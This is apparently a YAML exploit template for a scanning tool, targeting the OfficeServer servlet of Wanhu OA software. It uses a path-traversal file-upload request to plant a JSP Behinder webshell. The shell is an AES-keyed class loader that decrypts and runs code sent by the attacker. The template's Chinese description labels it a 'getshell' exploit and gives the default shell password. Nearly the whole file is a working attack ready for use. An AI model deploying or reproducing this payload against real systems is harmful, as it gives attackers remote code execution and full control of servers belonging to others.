35 lines
1.4 KiB
YAML
35 lines
1.4 KiB
YAML
|
method: POST
|
|||
|
|
url: $
|
|||
|
|
tlsversion: HTTP/1.1
|
|||
|
|
uri: /defaultroot/officeserverservlet
|
|||
|
|
param:
|
|||
|
|
data: |
|
|||
|
|
DBSTEP V3.0 185 0 611
|
|||
|
|
DBSTEP=REJTVEVQ
|
|||
|
|
OPTION=U0FWRUZJTEU=
|
|||
|
|
RECORDID=
|
|||
|
|
firstFilesize=dHJ1ZQ==
|
|||
|
|
isDoc=dHJ1ZQ==
|
|||
|
|
moduleType=aW5mb3JtYXRpb24=
|
|||
|
|
FILETYPE=Ly4uLy4uL3B1YmxpYy9lZGl0L3RhMi5qc3A=
|
|||
|
|
isViewOld=MQ==
|
|||
|
|
|
|||
|
|
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
|
|||
|
|
<%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%>
|
|||
|
|
<%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);
|
|||
|
|
Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));
|
|||
|
|
new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
|
|||
|
|
others:
|
|||
|
|
User-Agent: Go-http-client/1.1
|
|||
|
|
Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3'
|
|||
|
|
Accept-Encoding: gzip, deflate
|
|||
|
|
Accept-Language: 'zh-CN,zh;q=0.9,en;q=0.8'
|
|||
|
|
Connection: close
|
|||
|
|
Upgrade-Insecure-Requests: 1
|
|||
|
|
Content-Length: 790
|
|||
|
|
condition:
|
|||
|
|
words: DBSTEP
|
|||
|
|
time:
|
|||
|
|
expinformation:
|
|||
|
|
expname: 万户getshell
|
|||
|
|
expdescribe: 万户getshell,可能需要代理模式下进行使用,默认冰蝎马,密码为rebeyond
|